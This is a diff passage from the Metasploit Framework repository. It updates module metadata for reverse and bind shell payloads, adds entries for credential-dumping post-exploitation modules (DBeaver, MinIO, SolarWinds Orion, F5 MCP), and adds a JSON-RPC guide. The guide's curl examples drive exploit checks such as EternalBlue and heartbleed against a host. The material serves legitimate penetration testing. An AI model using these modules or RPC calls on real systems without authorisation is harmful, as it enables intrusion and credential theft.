    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_bash_udp",
@@ -173684,7 +173984,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_jjs.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_jjs",
@@ -173718,7 +174018,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ksh.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ksh",
@@ -173752,7 +174052,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_lua.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_lua",
@@ -173786,7 +174086,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ncat_ssl",
@@ -173822,7 +174122,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_netcat.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_netcat",
@@ -173856,7 +174156,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_netcat_gaping",
@@ -173924,7 +174224,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_openssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_openssl",
@@ -173958,7 +174258,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_perl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_perl",
@@ -173992,7 +174292,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_perl_ssl",
@@ -174026,7 +174326,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_php_ssl",
@@ -174060,7 +174360,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_python",
@@ -174094,7 +174394,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-08 10:26:27 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_python_ssl",
@@ -174128,7 +174428,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_r.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_r",
@@ -174162,7 +174462,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ruby.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ruby",
@@ -174196,7 +174496,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ruby_ssl",
@@ -174230,7 +174530,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_socat_udp.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_socat_udp",
@@ -174265,7 +174565,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ssh.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ssh",
@@ -174300,7 +174600,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ssl_double_telnet",
@@ -174368,7 +174668,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_tclsh.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_tclsh",
@@ -174403,7 +174703,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_zsh.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_zsh",
@@ -174473,7 +174773,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/bind_lua.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/bind_lua",
@@ -174509,7 +174809,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/bind_perl.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/bind_perl",
@@ -174545,7 +174845,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/bind_perl_ipv6",
@@ -174579,7 +174879,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/bind_ruby.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/bind_ruby",
@@ -174718,7 +175018,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/jjs_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/jjs_reverse_tcp",
@@ -185832,7 +186132,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/reverse_lua.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/reverse_lua",
@@ -185867,7 +186167,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/reverse_perl.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/reverse_perl",
@@ -185902,7 +186202,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/reverse_powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/reverse_powershell",
@@ -185936,7 +186236,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/reverse_ruby.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/reverse_ruby",
@@ -206288,7 +206588,7 @@
    "needs_cleanup": null
  },
  "post_linux/gather/enum_commands": {
-    "name": "Testing commands needed in a function",
+    "name": "Gather Available Shell Commands",
    "fullname": "post/linux/gather/enum_commands",
    "aliases": [

@@ -206299,17 +206599,17 @@
    "author": [
      "Alberto Rafael Rodriguez Iglesias <albertocysec@gmail.com>"
    ],
-    "description": "This module will be applied on a session connected to a shell. It will check which commands are available in the system.",
+    "description": "This module will check which shell commands are available on a system.\"",
    "references": [

    ],
-    "platform": "Linux",
+    "platform": "Linux,Unix",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-24 11:22:19 +0000",
+    "mod_time": "2022-12-20 23:42:51 +0000",
    "path": "/modules/post/linux/gather/enum_commands.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/enum_commands",
@@ -206317,6 +206617,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
      "shell",
@@ -206634,6 +206943,54 @@
    ],
    "needs_cleanup": null
  },
+  "post_linux/gather/f5_loot_mcp": {
+    "name": "F5 Big-IP Gather Information from MCP Datastore",
+    "fullname": "post/linux/gather/f5_loot_mcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-11-16",
+    "type": "post",
+    "author": [
+      "Ron Bowes"
+    ],
+    "description": "This module gathers various interesting pieces of data from F5's\n          \"mcp\" datastore, which is accessed via /var/run/mcp using a\n          proprietary protocol.\n\n          Adapted from:  https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-getloot.rb",
+    "references": [
+      "URL-https://github.com/rbowes-r7/refreshing-mcp-tool",
+      "URL-https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/",
+      "URL-https://support.f5.com/csp/article/K97843387"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-11-29 17:52:23 +0000",
+    "path": "/modules/post/linux/gather/f5_loot_mcp.rb",
+    "is_install_path": true,
+    "ref_name": "linux/gather/f5_loot_mcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": null
+  },
  "post_linux/gather/gnome_commander_creds": {
    "name": "Linux Gather Gnome-Commander Creds",
    "fullname": "post/linux/gather/gnome_commander_creds",
@@ -207646,6 +208003,53 @@
    ],
    "needs_cleanup": null
  },
+  "post_multi/gather/dbeaver": {
+    "name": "Gather Dbeaver Passwords",
+    "fullname": "post/multi/gather/dbeaver",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Kali-Team <kali-team@qq.com>"
+    ],
+    "description": "This module will determine if Dbeaver is installed on the target system and, if it is, it will try to\n          dump all saved session information from the target. The passwords for these saved sessions will then be decrypted\n          where possible.",
+    "references": [
+      "URL-https://blog.kali-team.cn/Metasploit-dbeaver-9f42e26241c94ba785dce5f1e69697aa"
+    ],
+    "platform": "Linux,OSX,Unix,Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-11 20:00:09 +0000",
+    "path": "/modules/post/multi/gather/dbeaver.rb",
+    "is_install_path": true,
+    "ref_name": "multi/gather/dbeaver",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter",
+      "shell",
+      "powershell"
+    ],
+    "needs_cleanup": null
+  },
  "post_multi/gather/dbvis_enum": {
    "name": "Multi Gather DbVisualizer Connections Settings",
    "fullname": "post/multi/gather/dbvis_enum",
@@ -208311,7 +208715,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-12-27 12:32:26 +0000",
    "path": "/modules/post/multi/gather/jenkins_gather.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/jenkins_gather",
@@ -208402,6 +208806,53 @@
    ],
    "needs_cleanup": null
  },
+  "post_multi/gather/minio_client": {
+    "name": "Gather MinIO Client Key",
+    "fullname": "post/multi/gather/minio_client",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Kali-Team <kali-team@qq.com>"
+    ],
+    "description": "This is a module that searches for MinIO Client credentials on a windows remote host.",
+    "references": [
+      "URL-https://blog.kali-team.cn/Metasploit-MinIO-Client-7d940c60ae8545aeaa29c96536dda855"
+    ],
+    "platform": "Linux,OSX,Unix,Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-11 14:30:23 +0000",
+    "path": "/modules/post/multi/gather/minio_client.rb",
+    "is_install_path": true,
+    "ref_name": "multi/gather/minio_client",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter",
+      "powershell",
+      "shell"
+    ],
+    "needs_cleanup": null
+  },
  "post_multi/gather/multi_command": {
    "name": "Multi Gather Run Shell Command Resource File",
    "fullname": "post/multi/gather/multi_command",
@@ -211889,7 +212340,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2022-11-17 16:49:11 +0000",
    "path": "/modules/post/windows/gather/bloodhound.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/bloodhound",
@@ -211902,6 +212353,12 @@
      ],
      "SideEffects": [
        "artifacts-on-disk"
+      ],
+      "Stability": [
+
+      ],
+      "Reliability": [
+
      ]
    },
    "session_types": [
@@ -214482,6 +214939,53 @@
    ],
    "needs_cleanup": null
  },
+  "post_windows/gather/credentials/solarwinds_orion_dump": {
+    "name": "SolarWinds Orion Secrets Dump",
+    "fullname": "post/windows/gather/credentials/solarwinds_orion_dump",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2022-11-08",
+    "type": "post",
+    "author": [
+      "npm <npm@cesium137.io>",
+      "Rob Fuller"
+    ],
+    "description": "This module exports and decrypts credentials from SolarWinds Orion Network\n          Performance Monitor (NPM) to a CSV file; it is intended as a post-exploitation\n          module for Windows hosts with SolarWinds Orion NPM installed. The module\n          supports decryption of AES-256, RSA, and XMLSEC secrets. Separate actions for\n          extraction and decryption of the data are provided to allow session migration\n          during execution in order to log in to the SQL database using SSPI. Tested on\n          the 2020 version of SolarWinds Orion NPM. This module is possible only because\n          of the source code and technical information published by Rob Fuller and\n          Atredis Partners.",
+    "references": [
+      "URL-https://malicious.link/post/2020/solarflare-release-password-dumper-for-SolarWinds-orion/",
+      "URL-https://github.com/atredispartners/solarwinds-orion-cryptography"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-12-20 08:55:19 +0000",
+    "path": "/modules/post/windows/gather/credentials/solarwinds_orion_dump.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/solarwinds_orion_dump",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null
+  },
  "post_windows/gather/credentials/spark_im": {
    "name": "Windows Gather Spark IM Password Extraction",
    "fullname": "post/windows/gather/credentials/spark_im",
@@ -1 +1 @@
-3.0.2
+3.0.5
@@ -1,8 +1,11 @@
 source 'https://rubygems.org'

-gem 'jekyll', '~> 4.2.0'
+gem 'jekyll', '~> 4.3.0'
 gem 'just-the-docs', github: 'rapid7/just-the-docs', branch: 'r7_ver_custom'
+# Useful when testing local just-the-docs changes:
+#gem 'just-the-docs', path: '../../just-the-docs'
 gem 'webrick'
+gem 'rexml'

 group :jekyll_plugins do
  gem 'jekyll-sitemap'
@@ -1,6 +1,6 @@
 GIT
  remote: https://github.com/rapid7/just-the-docs.git
-  revision: 9c5e78f98185406e50ab04f523a86bd857e186cf
+  revision: 5c7ea378f6392ea19b52e8019ebaca8fc2331733
  branch: r7_ver_custom
  specs:
    just-the-docs (0.3.3)
@@ -12,8 +12,8 @@ GIT
 GEM
  remote: https://rubygems.org/
  specs:
-    addressable (2.8.0)
-      public_suffix (>= 2.0.2, < 5.0)
+    addressable (2.8.1)
+      public_suffix (>= 2.0.2, < 6.0)
    byebug (11.1.3)
    coderay (1.1.3)
    colorator (1.1.0)
@@ -25,23 +25,24 @@ GEM
    ffi (1.15.5)
    forwardable-extended (2.6.0)
    http_parser.rb (0.8.0)
-    i18n (1.10.0)
+    i18n (1.12.0)
      concurrent-ruby (~> 1.0)
-    jekyll (4.2.2)
+    jekyll (4.3.1)
      addressable (~> 2.4)
      colorator (~> 1.0)
      em-websocket (~> 0.5)
      i18n (~> 1.0)
-      jekyll-sass-converter (~> 2.0)
+      jekyll-sass-converter (>= 2.0, < 4.0)
      jekyll-watch (~> 2.0)
-      kramdown (~> 2.3)
+      kramdown (~> 2.3, >= 2.3.1)
      kramdown-parser-gfm (~> 1.0)
      liquid (~> 4.0)
-      mercenary (~> 0.4.0)
+      mercenary (>= 0.3.6, < 0.5)
      pathutil (~> 0.9)
-      rouge (~> 3.0)
+      rouge (>= 3.0, < 5.0)
      safe_yaml (~> 1.0)
-      terminal-table (~> 2.0)
+      terminal-table (>= 1.8, < 4.0)
+      webrick (~> 1.7)
    jekyll-include-cache (0.2.1)
      jekyll (>= 3.7, < 5.0)
    jekyll-sass-converter (2.2.0)
@@ -52,7 +53,7 @@ GEM
      jekyll (>= 3.7, < 5.0)
    jekyll-watch (2.2.1)
      listen (~> 3.0)
-    kramdown (2.3.2)
+    kramdown (2.4.0)
      rexml
    kramdown-parser-gfm (1.1.0)
      kramdown (~> 2.0)
@@ -64,35 +65,36 @@ GEM
    method_source (1.0.0)
    pathutil (0.16.2)
      forwardable-extended (~> 2.6)
-    pry (0.13.1)
+    pry (0.14.1)
      coderay (~> 1.1)
      method_source (~> 1.0)
-    pry-byebug (3.9.0)
+    pry-byebug (3.10.1)
      byebug (~> 11.0)
-      pry (~> 0.13.0)
-    public_suffix (4.0.7)
+      pry (>= 0.13, < 0.15)
+    public_suffix (5.0.1)
    rake (13.0.6)
-    rb-fsevent (0.11.1)
+    rb-fsevent (0.11.2)
    rb-inotify (0.10.1)
      ffi (~> 1.0)
    rexml (3.2.5)
-    rouge (3.28.0)
+    rouge (4.0.0)
    safe_yaml (1.0.5)
    sassc (2.4.0)
      ffi (~> 1.9)
-    terminal-table (2.0.0)
-      unicode-display_width (~> 1.1, >= 1.1.1)
-    unicode-display_width (1.8.0)
+    terminal-table (3.0.2)
+      unicode-display_width (>= 1.1.1, < 3)
+    unicode-display_width (2.3.0)
    webrick (1.7.0)

 PLATFORMS
  ruby

 DEPENDENCIES
-  jekyll (~> 4.2.0)
+  jekyll (~> 4.3.0)
  jekyll-sitemap
  just-the-docs!
  pry-byebug
+  rexml
  tzinfo (~> 1.2)
  tzinfo-data
  wdm (~> 0.1.1)
@@ -30,6 +30,9 @@ exclude:
  - README.md

 # just-the-docs config
+mermaid_enabled: true
+mermaid:
+  version: "9.2.2"
 heading_anchors: true
 aux_links_new_tab: true
 aux_links:
@@ -28,7 +28,7 @@ A listed `idea` is a seed for GSoC students to expand on and propose how to desi

 A place to get started with contributing to Metasploit is [here](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and expanded on [here](https://github.com/rapid7/metasploit-framework/wiki/Contributing-to-Metasploit#framework-bugs-and-features).

-GSoC mentors tend to look for those items that have a chance of making development and usage easier or improving the overall performance of a certain area, however by starting with understanding the most common contribution patten you can get familiar with the codebase and also the mindset of users. This will help you in creating a proposal with the end user in mind.
+GSoC mentors tend to look for those items that have a chance of making development and usage easier or improving the overall performance of a certain area, however by starting with understanding the most common contribution pattern you can get familiar with the codebase and also the mindset of users. This will help you in creating a proposal with the end user in mind.

 Once you have started digging feel free ask questions that help you understand the concepts you for the idea would like to propose.

@@ -0,0 +1,511 @@
+The RPC API enables you to programmatically drive the Metasploit Framework and commercial products using HTTP-based remote procedure call (RPC) services. An RPC service is a collection of message types and remote methods that provide a structured way for external applications to interact with web applications. You can use the RPC interface to locally or remotely execute Metasploit commands to perform basic tasks like running modules, communicating with the database, interacting with sessions, exporting data, and generating reports.
+
+The Metasploit products are written primarily in Ruby, which is the easiest way to use the remote API. However, in addition to Ruby, any language with support for HTTPS and MessagePack, such as Python, Java, and C, can be used to take advantage of the RPC API.
+
+There are currently two implementations of Metasploit's RPC:
+
+- HTTP and messagepack - covered by a separate guide
+- HTTP and JSON - covered by this guide
+
+Note that both the messagepack and JSON RPC services provide very similar operations, and it is worth reviewing both documents.
+
+## Starting the JSON API Server
+
+The pre-requisite to running the JSON API Server is to run your Metasploit database. This can be initialized with `msfdb`.
+Note that `msfdb` will ask if you wish to run the JSON RPC web service - but it is not required for this guide which
+shows how to run the JSON service directly with [thin](https://github.com/macournoyer/thin) or [Puma](https://github.com/puma/puma): 
+
+First run the Metasploit database:
+
+```
+msfdb init
+```
+
+After configuring the database the JSON RPC service can be initialized with the [thin](https://github.com/macournoyer/thin) Ruby web server:
+
+```
+bundle exec thin --rackup msf-json-rpc.ru --address 0.0.0.0 --port 8081 --environment production --tag msf-json-rpc start
+```
+
+Or with [Puma](https://github.com/puma/puma):
+
+```
+bundle exec puma msf-json-rpc.ru --port 8081 --environment production --tag msf-json-rpc start
+```
+
+### Development
+
+If you are wanting to develop or debug the Ruby implementation of the JSON RPC service - it can be useful to run the Metasploit API synchronously in the foreground.
+This allows for console logs to appear directly in the terminal, as well as being able to interact with breakpoints via `require 'pry-byebug'; binding.pry`:
+
+It is possible to debug Msfconsole's webservice component too:
+
+```
+bundle exec ruby ./msfdb reinit
+bundle exec ruby ./msfdb --component webservice stop
+bundle exec ruby ./msfdb --component webservice --no-daemon start
+```
+
+### RPC Logging
+
+You can configure the RPC service logging with the `MSF_WS_DATA_SERVICE_LOGGER` environment variable. 
+
+The list of supported loggers is viewable with `msfconsole --help`. The list at the time of writing is:
+
+- Stdout / Stderr / StdoutWithoutTimestamps - Write logs to stdout/stderr
+- Flatfile / TimestampColorlessFlatfile  - Write logs to `~/.msf4/logs`
+
+Example usage:
+
+```
+$ MSF_WS_DATA_SERVICE_LOGGER=Stdout bundle exec thin --rackup msf-json-rpc.ru --address localhost --port 8081 --environment production --tag msf-json-rpc start
+[11/25/2020 17:34:53] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
+[11/25/2020 17:34:53] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
+[11/25/2020 17:34:53] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
+[11/25/2020 17:34:53] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
+[11/25/2020 17:34:54] [e(0)] core: Unable to load module /Users/adfoster/Documents/code/metasploit-framework/modules/auxiliary/gather/office365userenum.py - LoadError  Try running file manually to check for errors or dependency issues.
+Thin web server (v1.7.2 codename Bachmanity)
+Maximum connections set to 1024
+Listening on localhost:8081, CTRL+C to stop
+[11/25/2020 17:35:17] [d(0)] core: Already established connection to postgresql, so reusing active connection.
+[11/25/2020 17:35:17] [e(0)] core: DB.connect threw an exception - ActiveRecord::AdapterNotSpecified database configuration does not specify adapter
+[11/25/2020 17:35:17] [e(0)] core: Failed to connect to the database: database configuration does not specify adapter```
+```
+
+## Concepts
+
+The Metasploit RPC aims to follow the [jsonrpc specification](https://www.jsonrpc.org/specification). Therefore:
+
+- Each JSON RPC request should provide a unique message ID which the client and server can use to correlate requests and responses
+- Metasploit may return the following [error codes](https://github.com/rapid7/metasploit-framework/blob/87b1f3b602753e39226a475a5d737fb50200957d/lib/msf/core/rpc/json/error.rb#L3-L13).
+
+## Examples 
+
+First ensure you are running the Metasploit database, and are running the JSON service before running these examples
+
+### Querying
+
+#### Query DB status
+
+Request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Content-Type: application/json' \
+  --data '{
+        "jsonrpc": "2.0",
+        "method": "db.status",
+        "id": 1,
+        "params": []
+}'
+```
+
+Response:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "driver": "postgresql",
+    "db": "msf"
+  },
+  "id": 1
+}
+```
+
+#### Query workspaces
+
+Request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Content-Type: application/json' \
+  --data '{
+        "jsonrpc": "2.0",
+        "method": "db.workspaces",
+        "id": 1,
+        "params": []
+}'
+```
+
+Response:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "workspaces": [
+      {
+        "id": 1,
+        "name": "default",
+        "created_at": 1673368954,
+        "updated_at": 1673368954
+      }
+    ]
+  },
+  "id": 1
+}
+```
+
+### Modules workflow
+
+#### Search for modules
+
+Request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'content-type: application/json' \
+  --data '{ "jsonrpc": "2.0", "method": "module.search", "id": 1, "params": ["psexec author:egypt arch:x64"] }'
+```
+
+Response:
+
+```json
+{
+    "jsonrpc": "2.0",
+    "result": [
+        {
+            "type": "exploit",
+            "name": "PsExec via Current User Token",
+            "fullname": "exploit/windows/local/current_user_psexec",
+            "rank": "excellent",
+            "disclosuredate": "1999-01-01"
+        }
+    ],
+    "id": 1
+}
+```
+
+#### Run module check methods
+
+Metasploit modules support running `check` methods which can be used to identify the success of an exploit module, or to run an
+auxiliary module against a target. For instance, with an Auxiliary module check request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "module.check",
+    "id": 1,
+    "params": [
+        "auxiliary",
+        "auxiliary/scanner/ssl/openssl_heartbleed",
+        {
+            "RHOST": "192.168.123.13"
+        }
+    ]
+}'
+```
+
+Or an Exploit module check request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'content-type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "module.check",
+    "id": 1,
+    "params": [
+        "exploit",
+        "exploit/windows/smb/ms17_010_eternalblue",
+        {
+          "RHOST": "192.168.123.13"
+        }
+    ]
+}'
+```
+
+The response will contain an identifier which can be used to query for updates:
+
+```json
+{
